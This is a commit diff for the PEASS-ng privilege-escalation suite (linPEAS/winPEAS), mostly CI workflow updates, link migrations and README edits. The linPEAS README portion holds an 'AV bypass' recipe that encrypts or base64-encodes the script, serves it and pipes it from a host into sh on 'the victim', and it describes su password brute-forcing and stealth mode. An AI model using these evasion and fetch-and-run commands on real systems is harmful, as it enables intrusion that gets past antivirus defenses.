Update CONTRIBUTING.md

Merge pull request #438 from tunnellord/master
User folder for cloud creds
2025-12-07 09:31:30 +00:00 · 2024-09-23 14:41:43 +02:00 · 2024-09-23 14:41:05 +02:00 · 2024-09-23 14:36:50 +02:00 · 2024-09-22 14:35:21 +02:00 · 2024-09-19 11:57:19 +02:00
921 changed files with 82359 additions and 11320 deletions
--- a/.github/workflows/CI-master_tests.yml
+++ b/.github/workflows/CI-master_tests.yml
@@ -4,6 +4,7 @@ on:
  push:
    branches:
      - master
+      - main
    paths-ignore:
        - '.github/**'
  
@@ -49,9 +50,9 @@ jobs:
      - name: run MSBuild
        run: msbuild $env:Solution_Path
        
-      # Execute all unit tests in the solution - It's broken :(
-      #- name: Execute unit tests
-      #  run: dotnet test $env:Solution_Path
+      # Execute all unit tests in the solution
+      - name: Execute unit tests
+        run: dotnet test $env:Solution_Path
        
      # Build & update all versions
      - name: Build all versions
@@ -99,52 +100,46 @@ jobs:
      
      # Upload all the versions for the release
      - name: Upload winpeasx64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx64.exe
          path: winPEAS\winPEASexe\binaries\x64\Release\winPEASx64.exe
      
      - name: Upload winpeasx86
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx86.exe
          path: winPEAS\winPEASexe\binaries\x86\Release\winPEASx86.exe
      
      - name: Upload winpeasany
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASany.exe
          path: winPEAS\winPEASexe\binaries\Release\winPEASany.exe
      
      - name: Upload winpeasx64ofs
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx64_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe
      
      - name: Upload winpeasx86ofs
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASx86_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe
          
      - name: Upload winpeasanyofs
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEASany_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe
      
      - name: Upload winpeas.bat
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: winPEAS.bat
          path: winPEAS\winPEASbat\winPEAS.bat
-      
-      - name: Upload winpeas.ps1
-        uses: actions/upload-artifact@v2
-        with:
-          name: winPEAS.ps1
-          path: winPEAS\winPEASps1\winPEAS.ps1
          
      # Git add
      #- name: Create local changes
@@ -189,7 +184,9 @@ jobs:
        run: |
          python3 -m pip install PyYAML
          cd linPEAS
-          python3 -m builder.linpeas_builder
+          python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
+          python3 -m builder.linpeas_builder --all-no-fat --output linpeas.sh
+          python3 -m builder.linpeas_builder --small --output linpeas_small.sh
      
      # Build linpeas binaries
      - name: Build linpeas binaries 
@@ -207,35 +204,35 @@ jobs:
            
      # Run linpeas help as quick test
      - name: Run linpeas help
-        run: linPEAS/linpeas.sh -h
+        run: linPEAS/linpeas_fat.sh -h && linPEAS/linpeas.sh -h && linPEAS/linpeas_small.sh -h
      
      # Run linpeas as a test
      - name: Run linpeas system_information
-        run: linPEAS/linpeas.sh -o system_information -a
+        run: linPEAS/linpeas_fat.sh -o system_information -a
      
      - name: Run linpeas container
-        run: linPEAS/linpeas.sh -o container -a
+        run: linPEAS/linpeas_fat.sh -o container -a
      
      - name: Run linpeas cloud
-        run: linPEAS/linpeas.sh -o cloud -a
+        run: linPEAS/linpeas_fat.sh -o cloud -a
      
      - name: Run linpeas procs_crons_timers_srvcs_sockets
-        run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a
+        run: linPEAS/linpeas_fat.sh -o procs_crons_timers_srvcs_sockets -a
      
      - name: Run linpeas network_information
-        run: linPEAS/linpeas.sh -o network_information -t -a
+        run: linPEAS/linpeas_fat.sh -o network_information -t -a
      
      - name: Run linpeas users_information
-        run: linPEAS/linpeas.sh -o users_information -a
+        run: linPEAS/linpeas_fat.sh -o users_information -a
      
      - name: Run linpeas software_information
-        run: linPEAS/linpeas.sh -o software_information -a
+        run: linPEAS/linpeas_fat.sh -o software_information -a
      
      - name: Run linpeas interesting_perms_files
-        run: linPEAS/linpeas.sh -o interesting_perms_files -a
+        run: linPEAS/linpeas_fat.sh -o interesting_perms_files -a
      
      - name: Run linpeas interesting_files
-        run: linPEAS/linpeas.sh -o interesting_files -a
+        run: linPEAS/linpeas_fat.sh -o interesting_files -a
      
      # Too much time
      #- name: Run linpeas api_keys_regex
@@ -243,51 +240,57 @@ jobs:
      
      # Upload files for release
      - name: Upload linpeas.sh
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas.sh
          path: linPEAS/linpeas.sh
      
      - name: Upload linpeas_fat.sh
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_fat.sh
          path: linPEAS/linpeas_fat.sh
      
+      - name: Upload linpeas_small.sh
+        uses: actions/upload-artifact@v4
+        with:
+          name: linpeas_small.sh
+          path: linPEAS/linpeas_small.sh
+      
      ## Linux bins
      - name: Upload linpeas_linux_386
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_386
          path: sh2bin/builds/linpeas_linux_386
      
      - name: Upload linpeas_linux_amd64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_amd64
          path: sh2bin/builds/linpeas_linux_amd64
      
      - name: Upload linpeas_linux_arm
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_arm
          path: sh2bin/builds/linpeas_linux_arm
          
      - name: Upload linpeas_linux_arm64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_linux_arm64
          path: sh2bin/builds/linpeas_linux_arm64
      
      ## Darwin bins
      - name: Upload linpeas_darwin_amd64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_darwin_amd64
          path: sh2bin/builds/linpeas_darwin_amd64
          
      - name: Upload linpeas_darwin_arm64
-        uses: actions/upload-artifact@v2
+        uses: actions/upload-artifact@v4
        with:
          name: linpeas_darwin_arm64
          path: sh2bin/builds/linpeas_darwin_arm64
@@ -321,14 +324,14 @@ jobs:
      # Build linpeas
      - name: Build macpeas
        run: |
-          python3 -m pip install PyYAML
-          python3 -m pip install requests
+          python3 -m pip install PyYAML --break-system-packages
+          python3 -m pip install requests --break-system-packages
          cd linPEAS
-          python3 -m builder.linpeas_builder
+          python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
      
      # Run linpeas help as quick test
      - name: Run macpeas help
-        run: linPEAS/linpeas.sh -h
+        run: linPEAS/linpeas_fat.sh -h
      
      # Run macpeas parts to test it
      #- name: Run macpeas
@@ -342,77 +345,82 @@ jobs:
    steps:
    # Download files to release
    - name: Download winpeasx64ofs
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx64_ofs.exe

    - name: Download winpeasx86ofs
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx86_ofs.exe

    - name: Download winpeasanyofs
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASany_ofs.exe

    - name: Download winpeasx64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx64.exe
    
    - name: Download winpeasx86
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASx86.exe

    - name: Download winpeasany
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEASany.exe
    
    - name: Download winpeas.bat
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: winPEAS.bat

    - name: Download linpeas.sh
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas.sh
    
    - name: Download linpeas_fat.sh
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_fat.sh
+    
+    - name: Download linpeas_small.sh
+      uses: actions/download-artifact@v4.1.7
+      with:
+        name: linpeas_small.sh

    - name: Download linpeas_linux_386
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_386

    - name: Download linpeas_linux_amd64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_amd64

    - name: Download linpeas_linux_arm
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_arm

    - name: Download linpeas_linux_arm64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_linux_arm64

    - name: Download linpeas_darwin_amd64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_darwin_amd64

    - name: Download linpeas_darwin_arm64
-      uses: actions/download-artifact@v2
+      uses: actions/download-artifact@v4.1.7
      with:
        name: linpeas_darwin_arm64
    
--- a/.github/workflows/aicoder.yml
+++ b/.github/workflows/aicoder.yml
@@ -1,23 +0,0 @@
-name: aicoder
-
-on:
-  workflow_dispatch:
-
-jobs:
-  Build_and_test_winpeas_master:
-    runs-on: ubuntu-latest
-
-    steps:
-      # checkout
-      - name: AICoder GH Action
-        uses: AICoderHub/GH_Action@v0.11
-        with:
-          INPUT_MODE: 'file-optimizer'
-          INPUT_PROMPT: ''
-          INPUT_OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
-          INPUT_MODEL: 'gpt-4'
-          TEMPLATE_FILES: ''
-          ORIGIN_BRANCH: 'aicoder'
-          TO_BRANCH: 'master'
-          CHECK_PATH: './parsers/json2pdf.py'
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
--- a/.github/workflows/artifacts_cleanup.yml
+++ b/.github/workflows/artifacts_cleanup.yml
@@ -0,0 +1,14 @@
+name: 'nightly artifacts cleanup'
+on:
+  schedule:
+    - cron: '0 6 * * 2' # At 6am on Tuesdays
+  workflow_dispatch:
+
+jobs:
+  delete-artifacts:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: kolpav/purge-artifacts-action@v1
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          expire-in: 1days # Set this to 0 to delete all artifacts
--- a/AICoder.py
+++ b/AICoder.py
@@ -1,208 +0,0 @@
-import argparse
-import os
-import sys
-import string
-import random
-from typing import List
-import openai
-import json
-import subprocess
-import tiktoken
-import requests
-from github import Github
-
-#########################
-#### OPENAI FUNCTIONS ###
-#########################
-
-def reportTokens(prompt, model="gpt-4"):
-    encoding = tiktoken.encoding_for_model(model)
-    print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
-
-def write_file(file_path: str, content: str):
-    """Write content to a file creating the needed directories first"""
-    os.makedirs(os.path.dirname(file_path), exist_ok=True)
-
-    with open(file_path, "w") as file:
-        file.write(content)
-
-def delete_file(file_path: str):
-    """Delete a file if it exists"""
-
-    if os.path.isfile(file_path):
-        os.remove(file_path)
-
-openai_available_functions = {
-    "write_file": write_file, "delete_file": delete_file
-}
-
-openai_functions = [
-    {
-        "name": "write_file",
-        "description": "Write a file giving the path and the content",
-        "parameters": {
-            "type": "object",
-            "properties": {
-                "file_path": {
-                    "type": "string",
-                    "description": "Path to the file to write",
-                },
-                "content": {
-                    "type": "string",
-                    "description": "Content to write in the file",
-                },
-            },
-            "required": ["file_path", "content"],
-        },
-    },
-    {
-        "name": "delete_file",
-        "description": "Delete a file",
-        "parameters": {
-            "type": "object",
-            "properties": {
-                "file_path": {
-                    "type": "string",
-                    "description": "Path to the file to write",
-                }
-            },
-            "required": ["file_path"],
-        },
-    }
-]
-
-
-#########################
-#### GIT FUNCTIONS ######
-#########################
-
-
-def create_pull_request(branch_name, commit_message, github_token):
-    github = Github(github_token)
-    repo = github.get_repo(os.environ["GITHUB_REPOSITORY"])
-
-    # Create a new branch
-    base_branch = repo.get_branch(repo.default_branch)
-    repo.create_git_ref(ref=f"refs/heads/{branch_name}", sha=base_branch.commit.sha)
-
-    # Commit changes to the new branch
-    subprocess.run(["git", "checkout", branch_name])
-    subprocess.run(["git", "add", "."])
-    subprocess.run(["git", "commit", "-m", commit_message])
-    subprocess.run(["git", "push", "origin", branch_name])
-
-    # Create a pull request
-    pr = repo.create_pull(
-        title=commit_message,
-        body="Generated by OpenAI Github Action",
-        head=branch_name,
-        base=repo.default_branch
-    )
-
-    return pr.html_url
-
-
-#########################
-#### FILE PROCESSING ####
-#########################
-
-
-def process_file(prompt: str, api_key: str, file_path: str, model: str="gpt-4") -> str:
-    with open(file_path, "r") as file:
-        file_content = file.read()
-
-    messages = [
-        {"role": "system", "content": f"You are a developer and your goal is to generate code. The user will ask you to improve and modify some code. Your response must be a valid JSON with the path of each file to write as keys and the content of the files as values. Several files can be written at the same time."},
-        {"role": "user", "content": prompt},
-        {"role": "user", "content": f"This is the code from the file '{file_path}':\n\n{file_content}"}
-    ]
-    openai.api_key = api_key
-
-    reportTokens(f"This is the code from the file '{file_path}':\n\n{file_content}")
-
-    response = openai.ChatCompletion.create(
-        model=model,
-        messages=messages,
-        temperature=0
-    )
-    response_message = response["choices"][0]["message"]
-
-     # Step 2: check if GPT wanted to call a function
-    if response_message.get("function_call"):
-        
-        function_name = response_message["function_call"]["name"]
-        fuction_to_call = openai_available_functions[function_name]
-        function_args = json.loads(response_message["function_call"]["arguments"])
-        fuction_to_call(**function_args)
-
-
-def process_folder(prompt: str, api_key: str, folder_path: str, model: str="gpt-4") -> List[str]:
-    responses = []
-    for root, _, files in os.walk(folder_path):
-        for file in files:
-            file_path = os.path.join(root, file)
-            response = process_file(prompt, api_key, file_path, model)
-            responses.append(response)
-
-
-#########################
-#### MAIN FUNCTION ######
-#########################
-
-
-def get_random_string(length):
-    # With combination of lower and upper case
-    letters = string.ascii_letters
-    result_str = ''.join(random.choice(letters) for i in range(length))
-    return result_str
-
-def main(prompt: str, api_key: str, file_path: str, github_token: str, model: str="gpt-4"):
-    if os.path.isfile(file_path):
-        process_file(prompt, api_key, file_path, model)
-    elif os.path.isdir(file_path):
-        process_folder(prompt, api_key, file_path, model)
-    else:
-        print("Error: Invalid file path.")
-        sys.exit(1)
-
-    try:
-        create_pull_request(get_random_string(5), f"Modified {file_path}", github_token)
-    except Exception as e:
-        print(f"Error: Failed to create pull request. {e}")
-        sys.exit(1)
-
-if __name__ == "__main__":
-    # Setup the argument parser
-    parser = argparse.ArgumentParser()
-
-    # Add arguments for prompt, api_key, file_path and github_token
-    parser.add_argument('--prompt', default=None, type=str, help='Input prompt')
-    parser.add_argument('--api-key', default=None, type=str, help='Input API key')
-    parser.add_argument('--path', default=None, type=str, help='Input file/folder path')
-    parser.add_argument('--github-token', default=None, type=str, help='Github token')
-    parser.add_argument('--model', default="gpt-4", type=str, help='Model to use')
-
-    # Parse the arguments
-    args = parser.parse_args()
-    prompt = os.environ.get("INPUT_PROMPT", args.prompt)
-    api_key = os.environ.get("INPUT_API_KEY", args.api_key)
-    file_path = os.environ.get("INPUT_FILE_PATH", args.path)
-    github_token = os.environ.get("GITHUB_TOKEN", args.github_token)
-    model = os.environ.get("INPUT_MODEL", args.model)
-
-    if not prompt or not api_key or not file_path:
-        print("Error: Missing required inputs.")
-        sys.exit(1)
-    
-    #if not github_token:
-    #    print("Error: Missing github token.")
-    #    sys.exit(1)
-
-    if os.path.exists(prompt):
-        with open(prompt, "r") as file:
-            prompt = file.read()
-    
-    if prompt.startswith("http"):
-        prompt = requests.get(prompt).text
-    
-    main(prompt, api_key, file_path, github_token, model)
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,19 +1,19 @@
 # Contributing to this repository

 ## Making Suggestions 
-If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**
+If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/peass-ng/PEASS-ng/issues)**

 ## Do don't know how to help?
-Check out the **[TODO](https://github.com/carlospolop/PEASS-ng/blob/master/TODO.md) page**
+Check out the **[TODO](https://github.com/peass-ng/PEASS-ng/blob/master/TODO.md) page**

 ## Searching for files with sensitive information
-From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** file.
+From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** file.

-If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
+If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
 Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud.

 ## Specific LinPEAS additions
-From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*.
+From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that will be merged into linpeas.sh*.
 The new linpeas.sh script will be auto-generated in the PR.

 ## Specific WinPEAS additions
--- a/2
+++ b/2
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which peass-ng is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.

-peass-ng is (C) 2006-2022 Carlos Polop Martin.
+peass-ng is (C) 2019-2024 Carlos Polop Martin.

 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

-![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/peass.png)
+![](https://github.com/peass-ng/PEASS-ng/raw/master/linPEAS/images/peass.png)

 ![](https://img.shields.io/badge/Black-Arch-black) ![](https://img.shields.io/badge/Arch-AUR-brightgreen) ![](https://img.shields.io/badge/Black%20Hat%20Arsenal-Asia%202020-red)

@@ -13,33 +13,28 @@ Here you will find **privilege escalation tools for Windows and Linux/Unix\* and
 These tools search for possible **local privilege escalation paths** that you could exploit and print them to you **with nice colors** so you can recognize the misconfigurations easily.

 - Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**
- **[WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**
+- **[WinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**

 - Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)**
- **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
+- **[LinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**

 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.

 ## JSON, HTML & PDF output
 Check the **[parsers](./parsers/)** directory to **transform PEASS outputs to JSON, HTML and PDF**

-## Support PEASS-ng and HackTricks and get benefits
+## Join us!

-Do you want to have **access the latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop?frequency=one-time) for individuals and companies**.
-
-**LinPEAS, WinPEAS and MacPEAS** aren’t enough for you? Welcome [**The PEASS Family**](https://opensea.io/collection/the-peass-family/), a limited collection of [**exclusive NFTs**](https://opensea.io/collection/the-peass-family/) of our favourite PEASS in disguise, designed by my team. Go **get your favourite and make it yours!** And if you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
+If you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**

 You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).

 ## Let's improve PEASS together

-If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/CONTRIBUTING.md)** file.
+If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/peass-ng/PEASS-ng/blob/master/CONTRIBUTING.md)** file.

 ## Advisory

 All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.

-
-
-By Polop<sup>(TM)</sup>
--- a/TODO.md
+++ b/TODO.md
@@ -1,7 +1,7 @@
 # TODO

 ### Generate Nice Reports
- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/carlospolop/PEASS-ng/tree/master/parser).
+- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/peass-ng/PEASS-ng/tree/master/parser).
 - [ ] Create a python script that generates a nice HTML/PDF from the JSON output

 ### Generate a DB of Known Vulnerable Binaries
--- a/build_lists/regexes.yaml
+++ b/build_lists/regexes.yaml
@@ -1,2 +1,3 @@
-This is a placeholder.
-To fill this yaml execute one of the scripts download_regexes.py or download_regexes.ps1
+# This is a placeholder
+# It will be replaced by the actual regexes.yaml file
+# generated by download-regexes.py or download-regexes.ps1 (execute it before building the tools)
--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@@ -1,6 +1,6 @@
 # LinPEAS - Linux Privilege Escalation Awesome Script

-![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)
+![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)

 **LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)**

@@ -12,12 +12,28 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks

 Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed**

+## Build your own linpeas!
+
+The latest version of linpeas allows you to **select the checks you would like your linpeas to have** and built it only with those checks!
+
+This allows to create **smaller and faster linpeas scripts** for stealth and speed purposes.
+
+Check how to **select the checks you want to build [in your own linpeas following this link.](builder)**
+
+Note that by default, in the releases pages of this repository, you will find a **linpeas with all the checks**.
+
+## Differences between `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
+
+- **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
+- **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
+- **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
+
 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.

 ```bash
-# From github
-curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+# From public github
+curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
 ```

 ```bash
@@ -42,11 +58,24 @@ less -r /dev/shm/linpeas.txt #Read with colors

 ```bash
 # Use a linpeas binary
-wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
+wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
 chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```

+## AV bypass
+```bash
+#open-ssl encryption
+openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
+sudo python -m SimpleHTTPServer 80 #Start HTTP server
+curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
+
+#Base64 encoded
+base64 -w0 linpeas.sh > lp.enc
+sudo python -m SimpleHTTPServer 80 #Start HTTP server
+curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
+```
+
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.

@@ -63,19 +92,6 @@ bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
 bash /path/to/linpeas.sh -f /path/to/folder
 ```

-## AV bypass
-```bash
-#open-ssl encryption
-openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
-sudo python -m SimpleHTTPServer 80 #Start HTTP server
-curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
-
-#Base64 encoded
-base64 -w0 linpeas.sh > lp.enc
-sudo python -m SimpleHTTPServer 80 #Start HTTP server
-curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
-```
-
 ## Basic Information

 The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).
@@ -95,7 +111,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from *
 **Interesting parameters:**
 - **-a** (all checks except regex) - This will **execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using `su` with the top2000 passwords.**
 - **-e** (extra enumeration) - This will execute **enumeration checkes that are avoided by default**
- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the silesystem**
+- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the Filesystem**
 - **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk)
 - **-P** (Password) - Pass a password that will be used with `sudo -l` and bruteforcing other users
 - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
@@ -144,56 +160,23 @@ With LinPEAS you can also **discover hosts automatically** using `fping`, `ping`

 LinPEAS will **automatically search for this binaries** in `$PATH` and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning.

-![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)
+![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)


 ## Colors
-
-<details>
-<summary>Details</summary>
-
 LinPEAS uses colors to indicate where does each section begin. But **it also uses them the identify potencial misconfigurations**.

-The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).
+- The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).

-The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to PE:
- Possible exploitable kernel versions
- Vulnerable sudo versions
- Identify processes running as root
- Not mounted devices
- Dangerous fstab permissions
- Writable files in interesting directories
- SUID/SGID binaries that have some vulnerable version (it also specifies the vulnerable version)
- SUDO binaries that can be used to escalate privileges in sudo -l (without passwd) (https://gtfobins.github.io/)
- Check /etc/doas.conf
- 127.0.0.1 in netstat
- Known files that could contain passwords
- Capabilities in interesting binaries
- Interesting capabilities of a binary
- Writable folders and wilcards inside info about cron jobs
- Writables folders in PATH
- Groups that could lead to root
- Files that could contains passwords
- Suspicious cronjobs
+- The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to privilege escalation.

-The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for:
- Common processes run by root
- Common not interesting devices to mount
- Not dangerous fstab permissions
